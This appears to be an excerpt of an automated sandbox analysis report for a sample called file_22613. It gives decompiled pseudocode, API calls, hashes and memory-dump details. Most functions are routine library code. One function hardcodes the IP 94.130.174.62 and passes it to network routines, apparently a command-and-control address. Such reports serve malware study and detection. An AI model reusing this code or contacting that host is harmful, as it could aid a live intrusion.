                                                                                • Opcode Fuzzy Hash: b74019e941badcc367a1999a771556c98f961c38dd32cdfea6873b8bb65c1eda
                                                                                • Instruction Fuzzy Hash: 43F06272B497309BE720BB79B842B5D3690AF01B2DFA0424FE504672D2CB6C5941CA5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E004145DB(void* __ebx, signed int* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				signed int _t53;
                                                                                				void* _t58;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t62;
                                                                                				void* _t63;
                                                                                				void* _t65;
                                                                                				intOrPtr* _t67;
                                                                                				signed int* _t68;
                                                                                				void* _t75;
                                                                                				signed int _t77;
                                                                                				intOrPtr _t85;
                                                                                				signed int* _t89;
                                                                                				signed int _t93;
                                                                                				void* _t96;
                                                                                				void* _t97;
                                                                                
                                                                                				_push(0x2c);
                                                                                				E004219DE(E00435F11, __ebx, __edi, __esi);
                                                                                				_t72 =  *(_t96 + 8);
                                                                                				_t91 = __esi | 0xffffffff;
                                                                                				_t89 = __ecx;
                                                                                				if(_t72 != _t91) {
                                                                                					_t77 =  *( *(__ecx + 0x24));
                                                                                					__eflags = _t77;
                                                                                					if(_t77 == 0) {
                                                                                						L6:
                                                                                						__eflags = _t89[0x15];
                                                                                						if(_t89[0x15] != 0) {
                                                                                							E00414E42(_t89);
                                                                                							__eflags = _t89[0x11];
                                                                                							if(__eflags != 0) {
                                                                                								 *(_t96 - 0x2d) = _t72;
                                                                                								E00414BD3(_t72, _t89, _t96 - 0x2c, __eflags);
                                                                                								_t11 = _t96 - 4;
                                                                                								 *_t11 =  *(_t96 - 4) & 0x00000000;
                                                                                								__eflags =  *_t11;
                                                                                								while(1) {
                                                                                									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                                									_t48 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                									if( *((intOrPtr*)(_t96 - 0x18)) >= 0x10) {
                                                                                										_t85 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                									} else {
                                                                                										_t48 = _t96 - 0x2c;
                                                                                										_t85 = _t48;
                                                                                									}
                                                                                									_t78 = _t89[0x11];
                                                                                									_t93 =  *(_t89[0x11]);
                                                                                									_t72 =  *((intOrPtr*)(_t96 - 0x1c)) + _t48;
                                                                                									_t53 =  *((intOrPtr*)(_t93 + 0x14))( &(_t89[0x13]), _t96 - 0x2d, _t96 - 0x2c, _t96 - 0x38, _t85,  *((intOrPtr*)(_t96 - 0x1c)) + _t48, _t96 - 0x34);
                                                                                									__eflags = _t53;
                                                                                									if(_t53 < 0) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags = _t53 - 1;
                                                                                									if(_t53 > 1) {
                                                                                										__eflags = _t53 - 3;
                                                                                										if(__eflags != 0) {
                                                                                											break;
                                                                                										}
                                                                                										_push(_t89[0x15]);
                                                                                										_push( *(_t96 - 0x2d));
                                                                                										_t58 = E0041F70F(_t72, _t89, _t93, __eflags);
                                                                                										_t91 = _t93 | 0xffffffff;
                                                                                										__eflags = _t58 - _t91;
                                                                                										if(_t58 == _t91) {
                                                                                											L31:
                                                                                											E00402C34(_t96 - 0x2c, 1, 0);
                                                                                											goto L7;
                                                                                										}
                                                                                										L29:
                                                                                										_t91 =  *(_t96 + 8);
                                                                                										goto L31;
                                                                                									}
                                                                                									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                                									_t59 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                									if( *((intOrPtr*)(_t96 - 0x18)) < 0x10) {
                                                                                										_t59 = _t96 - 0x2c;
                                                                                									}
                                                                                									_t93 =  *((intOrPtr*)(_t96 - 0x34)) - _t59;
                                                                                									__eflags = _t93;
                                                                                									if(_t93 == 0) {
                                                                                										L22:
                                                                                										_t89[0x12] = 1;
                                                                                										__eflags =  *((intOrPtr*)(_t96 - 0x38)) - _t96 - 0x2d;
                                                                                										if( *((intOrPtr*)(_t96 - 0x38)) != _t96 - 0x2d) {
                                                                                											goto L29;
                                                                                										}
                                                                                										__eflags = _t93;
                                                                                										if(_t93 != 0) {
                                                                                											continue;
                                                                                										}
                                                                                										__eflags =  *((intOrPtr*)(_t96 - 0x1c)) - 0x20;
                                                                                										if( *((intOrPtr*)(_t96 - 0x1c)) >= 0x20) {
                                                                                											break;
                                                                                										}
                                                                                										_push(_t93);
                                                                                										_t75 = 8;
                                                                                										E0040D70E(_t75, _t78, _t96 - 0x2c, _t96);
                                                                                										continue;
                                                                                									} else {
                                                                                										__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                                										_t62 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                										if(__eflags < 0) {
                                                                                											_t62 = _t96 - 0x2c;
                                                                                										}
                                                                                										_push(_t89[0x15]);
                                                                                										_push(_t93);
                                                                                										_push(1);
                                                                                										_push(_t62);
                                                                                										_t63 = E00420840(_t72, _t85, _t89, _t93, __eflags);
                                                                                										_t97 = _t97 + 0x10;
                                                                                										__eflags = _t93 - _t63;
                                                                                										if(_t93 != _t63) {
                                                                                											break;
                                                                                										}
                                                                                										goto L22;
                                                                                									}
                                                                                								}
                                                                                								_t91 = _t93 | 0xffffffff;
                                                                                								__eflags = _t93 | 0xffffffff;
                                                                                								goto L31;
                                                                                							}
                                                                                							_push(_t89[0x15]);
                                                                                							_push(_t72);
                                                                                							_t65 = E0041F70F(_t72, _t89, _t91, __eflags);
                                                                                							__eflags = _t65 - _t91;
                                                                                							if(_t65 != _t91) {
                                                                                								L2:
                                                                                								return E00421A61(_t72, _t89, _t91);
                                                                                							}
                                                                                						}
                                                                                						L7:
                                                                                						goto L2;
                                                                                					}
                                                                                					_t67 =  *((intOrPtr*)(__ecx + 0x34));
                                                                                					__eflags = _t77 -  *_t67 + _t77;
                                                                                					if(_t77 >=  *_t67 + _t77) {
                                                                                						goto L6;
                                                                                					}
                                                                                					 *_t67 =  *_t67 - 1;
                                                                                					_t89 =  *(__ecx + 0x24);
                                                                                					_t68 =  *_t89;
                                                                                					 *_t89 =  &(_t68[0]);
                                                                                					 *_t68 = _t72;
                                                                                					goto L2;
                                                                                				}
                                                                                				goto L2;
                                                                                			}




















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fputc$H_prolog3_
                                                                                • String ID:
                                                                                • API String ID: 668804286-3916222277
                                                                                • Opcode ID: ef47f16c0367422376313d94ba93b47ab01917955661245194ee2ca7fca3368c
                                                                                • Instruction ID: d36e586d645ca0a6884918d23c657dff743b66b7d24b2ee2d935c5040e0d3755
                                                                                • Opcode Fuzzy Hash: ef47f16c0367422376313d94ba93b47ab01917955661245194ee2ca7fca3368c
                                                                                • Instruction Fuzzy Hash: 0E41E631E00119EFCF20DBA8D8809EEB7B5BF5A359F104117E521A7681D73CE895CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0041500D(void* __ebx, void* __edi, signed int* __esi) {
                                                                                				unsigned int _t36;
                                                                                				unsigned int _t37;
                                                                                				signed int _t41;
                                                                                				signed int _t44;
                                                                                				void* _t55;
                                                                                				signed int _t56;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				unsigned int _t61;
                                                                                				signed int _t62;
                                                                                				signed int _t63;
                                                                                				signed int _t66;
                                                                                				signed int* _t72;
                                                                                				signed int _t76;
                                                                                				signed int _t77;
                                                                                				signed int _t78;
                                                                                				void* _t80;
                                                                                				signed int _t81;
                                                                                				signed int _t82;
                                                                                				signed int* _t85;
                                                                                				signed int* _t86;
                                                                                				void* _t87;
                                                                                
                                                                                				_t85 = __esi;
                                                                                				_t55 = __ebx;
                                                                                				_t59 =  *__esi;
                                                                                				_push(__edi);
                                                                                				asm("cdq");
                                                                                				_t76 = 0x1c;
                                                                                				_t77 = (__esi[1] - _t59) / _t76;
                                                                                				if(_t77 > 0x9249248) {
                                                                                					E0041D3B9("vector<T> too long");
                                                                                				}
                                                                                				asm("cdq");
                                                                                				_t60 = 0x1c;
                                                                                				_t36 = (_t85[2] - _t59) / _t60;
                                                                                				_t78 = _t77 + 1;
                                                                                				if(_t78 <= _t36) {
                                                                                					return _t36;
                                                                                				} else {
                                                                                					_t61 = _t36;
                                                                                					_t37 = _t36 >> 1;
                                                                                					if(0x9249249 - _t37 >= _t61) {
                                                                                						_t62 = _t61 + _t37;
                                                                                						__eflags = _t62;
                                                                                					} else {
                                                                                						_t62 = 0;
                                                                                					}
                                                                                					if(_t62 < _t78) {
                                                                                						_t62 = _t78;
                                                                                					}
                                                                                					_t72 = _t85;
                                                                                					_pop(_t80);
                                                                                					_push(8);
                                                                                					E004219A8(E004369CC, _t55, _t80, _t85);
                                                                                					_t56 = _t62;
                                                                                					_t86 = _t72;
                                                                                					if(_t56 > 0x9249249) {
                                                                                						E0041D3B9("vector<T> too long");
                                                                                					}
                                                                                					_t41 = _t86[2] -  *_t86;
                                                                                					asm("cdq");
                                                                                					_t63 = 0x1c;
                                                                                					_t42 = _t41 / _t63;
                                                                                					_t95 = _t41 / _t63 - _t56;
                                                                                					if(_t41 / _t63 < _t56) {
                                                                                						_t44 = E0041510A(_t56, _t80, _t86);
                                                                                						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                                						 *(_t87 - 0x14) = _t44;
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push(_t86[1]);
                                                                                						E00415420(_t56,  *_t86, _t80, _t86, _t95);
                                                                                						_t66 =  *_t86;
                                                                                						asm("cdq");
                                                                                						_t81 = 0x1c;
                                                                                						_t82 = (_t86[1] - _t66) / _t81;
                                                                                						if(_t66 != 0) {
                                                                                							E0040E28F(_t66, _t86[1]);
                                                                                							_push( *_t86);
                                                                                							E0041DFFD();
                                                                                						}
                                                                                						_t42 =  *(_t87 - 0x14);
                                                                                						_t86[2] = _t56 * 0x1c + _t42;
                                                                                						_t86[1] = _t82 * 0x1c + _t42;
                                                                                						 *_t86 = _t42;
                                                                                					}
                                                                                					return E00421A4D(_t42);
                                                                                				}
                                                                                			}


























                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0041502A
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3CE
                                                                                  • Part of subcall function 0041D3B9: __CxxThrowException@8.LIBCMT ref: 0041D3E3
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3F4
                                                                                • __EH_prolog3_catch.LIBCMT ref: 0041506B
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00415081
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                • String ID: vector<T> too long
                                                                                • API String ID: 2448322171-3788999226
                                                                                • Opcode ID: ea10eb534e56437e673a6a8207653f0b33d0e920b89673a9f5cd7eb97e0659fd
                                                                                • Instruction ID: d7a5fa660dc45334f118aae398986fbed4eb9c2be1413dd2a810f30ebc390bdd
                                                                                • Opcode Fuzzy Hash: ea10eb534e56437e673a6a8207653f0b33d0e920b89673a9f5cd7eb97e0659fd
                                                                                • Instruction Fuzzy Hash: D821F676B40601CBC718AEBED941AAEBBD2AFD9700F21442FE156D7280D975DC804758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0040399D(void* __ebx, void* __edi, signed int* __esi) {
                                                                                				unsigned int _t36;
                                                                                				unsigned int _t37;
                                                                                				signed int _t41;
                                                                                				signed int _t44;
                                                                                				void* _t55;
                                                                                				signed int _t56;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				unsigned int _t61;
                                                                                				signed int _t62;
                                                                                				signed int _t63;
                                                                                				signed int _t66;
                                                                                				signed int* _t72;
                                                                                				signed int _t76;
                                                                                				signed int _t77;
                                                                                				signed int _t78;
                                                                                				void* _t80;
                                                                                				signed int _t81;
                                                                                				signed int _t82;
                                                                                				signed int* _t85;
                                                                                				signed int* _t86;
                                                                                				void* _t87;
                                                                                
                                                                                				_t85 = __esi;
                                                                                				_t55 = __ebx;
                                                                                				_t59 =  *__esi;
                                                                                				_push(__edi);
                                                                                				asm("cdq");
                                                                                				_t76 = 0x44;
                                                                                				_t77 = (__esi[1] - _t59) / _t76;
                                                                                				if(_t77 > 0x3c3c3c2) {
                                                                                					E0041D3B9("vector<T> too long");
                                                                                				}
                                                                                				asm("cdq");
                                                                                				_t60 = 0x44;
                                                                                				_t36 = (_t85[2] - _t59) / _t60;
                                                                                				_t78 = _t77 + 1;
                                                                                				if(_t78 <= _t36) {
                                                                                					return _t36;
                                                                                				} else {
                                                                                					_t61 = _t36;
                                                                                					_t37 = _t36 >> 1;
                                                                                					if(0x3c3c3c3 - _t37 >= _t61) {
                                                                                						_t62 = _t61 + _t37;
                                                                                						__eflags = _t62;
                                                                                					} else {
                                                                                						_t62 = 0;
                                                                                					}
                                                                                					if(_t62 < _t78) {
                                                                                						_t62 = _t78;
                                                                                					}
                                                                                					_t72 = _t85;
                                                                                					_pop(_t80);
                                                                                					_push(8);
                                                                                					E004219A8(E00436428, _t55, _t80, _t85);
                                                                                					_t56 = _t62;
                                                                                					_t86 = _t72;
                                                                                					if(_t56 > 0x3c3c3c3) {
                                                                                						E0041D3B9("vector<T> too long");
                                                                                					}
                                                                                					_t41 = _t86[2] -  *_t86;
                                                                                					asm("cdq");
                                                                                					_t63 = 0x44;
                                                                                					_t42 = _t41 / _t63;
                                                                                					_t95 = _t41 / _t63 - _t56;
                                                                                					if(_t41 / _t63 < _t56) {
                                                                                						_t44 = E00403E65(_t56, _t80, _t86);
                                                                                						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                                						 *(_t87 - 0x14) = _t44;
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push(_t86[1]);
                                                                                						E00404130(_t56,  *_t86, _t86, _t95);
                                                                                						_t66 =  *_t86;
                                                                                						asm("cdq");
                                                                                						_t81 = 0x44;
                                                                                						_t82 = (_t86[1] - _t66) / _t81;
                                                                                						if(_t66 != 0) {
                                                                                							E00403BE2(_t66, _t86[1]);
                                                                                							_push( *_t86);
                                                                                							E0041DFFD();
                                                                                						}
                                                                                						_t42 =  *(_t87 - 0x14);
                                                                                						_t86[2] = _t56 * 0x44 + _t42;
                                                                                						_t86[1] = _t82 * 0x44 + _t42;
                                                                                						 *_t86 = _t42;
                                                                                					}
                                                                                					return E00421A4D(_t42);
                                                                                				}
                                                                                			}


























                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004039BA
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3CE
                                                                                  • Part of subcall function 0041D3B9: __CxxThrowException@8.LIBCMT ref: 0041D3E3
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3F4
                                                                                • __EH_prolog3_catch.LIBCMT ref: 00403B43
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403B59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                • String ID: vector<T> too long
                                                                                • API String ID: 2448322171-3788999226
                                                                                • Opcode ID: caf408bf7c7c78d234a452ac1165b3b65d77af9f98161fa7f32abaea09853c7e
                                                                                • Instruction ID: 27951e7f13cd3f9d89d7299612a9be919273ff00fdd7874b3ca4fc8345b1606b
                                                                                • Opcode Fuzzy Hash: caf408bf7c7c78d234a452ac1165b3b65d77af9f98161fa7f32abaea09853c7e
                                                                                • Instruction Fuzzy Hash: 3821F8B2B002014BC714AF7ED982A2DBAE6ABD4305B20443FE296E73C1D979E9408719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00415E72(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t27;
                                                                                				void* _t40;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t71;
                                                                                				signed int _t72;
                                                                                				void* _t74;
                                                                                
                                                                                				_t58 = __edx;
                                                                                				_t49 = __ebx;
                                                                                				_t72 = _t74 - 0xfc;
                                                                                				_t27 =  *0x447674; // 0x4124c941
                                                                                				 *(_t72 + 0x100) = _t27 ^ _t72;
                                                                                				_push(4);
                                                                                				E00421975(E0043657D, __ebx, __edi, __esi);
                                                                                				_t60 = 0xf;
                                                                                				 *((intOrPtr*)(_t72 - 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t72 + 0x4c)) = _t60;
                                                                                				 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                				 *((char*)(_t72 + 0x38)) = 0;
                                                                                				 *((intOrPtr*)(_t72 - 4)) = 0;
                                                                                				 *((short*)(_t72 + 0x54)) = 0;
                                                                                				E00427E30(_t72 + 0x56, 0, 0xa8);
                                                                                				_push(0x55);
                                                                                				_push(_t72 + 0x54);
                                                                                				if( *0x44a124() != 0) {
                                                                                					E004037E9(_t72 + 0x1c, _t72 + 0x54);
                                                                                					 *((char*)(_t72 - 4)) = 1;
                                                                                					_t40 = E00417554(_t72 + 0x1c, _t58, _t72);
                                                                                					 *((char*)(_t72 - 4)) = 2;
                                                                                					E0040CFB8(_t72 + 0x38, _t40);
                                                                                					E00402C34(_t72, 1, 0);
                                                                                					 *((char*)(_t72 - 4)) = 0;
                                                                                					E00403960(0, _t72 + 0x1c, 1);
                                                                                					 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0;
                                                                                					 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
                                                                                					 *((char*)(__ebx)) = 0;
                                                                                					E0040CFB8(__ebx, _t72 + 0x38);
                                                                                					_push(0);
                                                                                				} else {
                                                                                					 *((intOrPtr*)(__ebx + 0x14)) = _t60;
                                                                                					 *(__ebx + 0x10) = 0;
                                                                                					 *((char*)(__ebx)) = 0;
                                                                                					E0040381A(__ebx, "Unknown");
                                                                                					_push(0);
                                                                                				}
                                                                                				E00402C34(_t72 + 0x38);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
                                                                                				_t64 = 1;
                                                                                				_pop(_t71);
                                                                                				_pop(_t50);
                                                                                				return E0041DEB4(_t49, _t50,  *(_t72 + 0x100) ^ _t72, _t58, _t64, _t71);
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00415E91
                                                                                • _memset.LIBCMT ref: 00415EBB
                                                                                • GetUserDefaultLocaleName.KERNEL32(?,00000055,?,?,00000004), ref: 00415EC9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DefaultH_prolog3LocaleNameUser_memset
                                                                                • String ID: Unknown
                                                                                • API String ID: 1926270201-1654365787
                                                                                • Opcode ID: 2243663a972f678b143bdf7af4488884c80a301cffa693733af90348c9f11b29
                                                                                • Instruction ID: d9ea72c496eaaa5414d8f42091f19b59f93f1a357cb2a3b62f3b36287fa83042
                                                                                • Opcode Fuzzy Hash: 2243663a972f678b143bdf7af4488884c80a301cffa693733af90348c9f11b29
                                                                                • Instruction Fuzzy Hash: B531D671A04258ABDB10DF69CC457DEBBA8AF14704F40406BF905A72C2C7B8DA48CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __fltout2.LIBCMT ref: 00DA8012
                                                                                  • Part of subcall function 00DA85D9: ___dtold.LIBCMT ref: 00DA85FF
                                                                                  • Part of subcall function 00DA85D9: _$I10_OUTPUT.LIBCMT ref: 00DA861A
                                                                                  • Part of subcall function 00DA85D9: _strcpy_s.LIBCMT ref: 00DA863A
                                                                                  • Part of subcall function 00DA85D9: __invoke_watson.LIBCMT ref: 00DA864D
                                                                                • __fptostr.LIBCMT ref: 00DA806D
                                                                                  • Part of subcall function 00C73DF7: __getptd_noexit.LIBCMT ref: 00C73DF7
                                                                                  • Part of subcall function 00C7202D: __decode_pointer.LIBCMT ref: 00C72038
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: I10____dtold__decode_pointer__fltout2__fptostr__getptd_noexit__invoke_watson_strcpy_s
                                                                                • String ID: -
                                                                                • API String ID: 2628802557-2547889144
                                                                                • Opcode ID: 9867b29c8b8db3a91144d3d7a1848221ecdfbb1cc0c9a330caf9ee0591a69c21
                                                                                • Instruction ID: 78ea6c7a6940b87d1a3eed59ab52c2c8e1d794a2800f38fa70811929bd0404b2
                                                                                • Opcode Fuzzy Hash: 9867b29c8b8db3a91144d3d7a1848221ecdfbb1cc0c9a330caf9ee0591a69c21
                                                                                • Instruction Fuzzy Hash: 2821A872E00109AFCF149F78CC858EF7BA9EF49360B048468F915E3251EA35D918E775
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E0040A958(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t23;
                                                                                				intOrPtr _t26;
                                                                                				void* _t36;
                                                                                				intOrPtr _t42;
                                                                                				void* _t47;
                                                                                				void* _t48;
                                                                                				void* _t51;
                                                                                
                                                                                				_t51 = __eflags;
                                                                                				_t36 = __ecx;
                                                                                				_push(0x40);
                                                                                				E004219DE(E00436798, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t47 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t47 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t47 - 0x1c)) = 0;
                                                                                				 *((char*)(_t47 - 0x2c)) = 0;
                                                                                				_push(0);
                                                                                				_t49 = _t48 - 0x1c;
                                                                                				 *((intOrPtr*)(_t47 - 0x4c)) = _t48 - 0x1c;
                                                                                				 *((char*)(_t47 - 4)) = 1;
                                                                                				E0040410F(_t49, _t47 + 8);
                                                                                				_push(_t47 - 0x48);
                                                                                				_t23 = E0040A0C4(0, _t36, __edi, _t49, _t51);
                                                                                				_t42 = _t47 - 0x2c;
                                                                                				 *((char*)(_t47 - 4)) = 2;
                                                                                				E0040CFB8(_t42, _t23);
                                                                                				 *((char*)(_t47 - 4)) = 1;
                                                                                				E00402C34(_t47 - 0x48, 1, 0);
                                                                                				_t26 =  *((intOrPtr*)(_t47 - 0x2c));
                                                                                				if( *((intOrPtr*)(_t47 - 0x18)) < 0x10) {
                                                                                					_t26 = _t42;
                                                                                				}
                                                                                				_t46 = "ERROR";
                                                                                				_push("ERROR");
                                                                                				_push(_t26);
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					E00403A16("94.130.174.62", __eflags, _t46, 5);
                                                                                				} else {
                                                                                					E00403C13("94.130.174.62", _t47 + 8, 0, 0xffffffff);
                                                                                				}
                                                                                				E00402C34(_t47 - 0x2c, 1, 0);
                                                                                				E00402C34(_t47 + 8, 1, 0);
                                                                                				return E00421A61(0, _t42, _t46);
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040A95F
                                                                                  • Part of subcall function 0040A0C4: __EH_prolog3.LIBCMT ref: 0040A0E3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040A9C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$H_prolog3H_prolog3_
                                                                                • String ID: 94.130.174.62$ERROR
                                                                                • API String ID: 2121961925-1872593727
                                                                                • Opcode ID: 98f9c94bcdb17d23357667d92f9ffb83a45d178a0b7e199d3b50367c1d52909a
                                                                                • Instruction ID: ee5dd9aa966b9db6d48cb73b56529966e75c62234c53b1ee6caa7af95aec0528
                                                                                • Opcode Fuzzy Hash: 98f9c94bcdb17d23357667d92f9ffb83a45d178a0b7e199d3b50367c1d52909a
                                                                                • Instruction Fuzzy Hash: D311B9B0D05208AADB10EBA9C846BDF7A7C9F14358F40446BF504B71C2D7B95A44CBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,00DA7757), ref: 00DA82B4
                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00DA82C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                • API String ID: 1646373207-3105848591
                                                                                • Opcode ID: 1a316d783e16cb874dc96d72b9e5f0dd665dc099e9312ae3e52d8c1842a121dd
                                                                                • Instruction ID: 1918f3ed3be030fde84cd22f9f9d17fd4cb9540b80ce6aafb7c14e644344bf2f
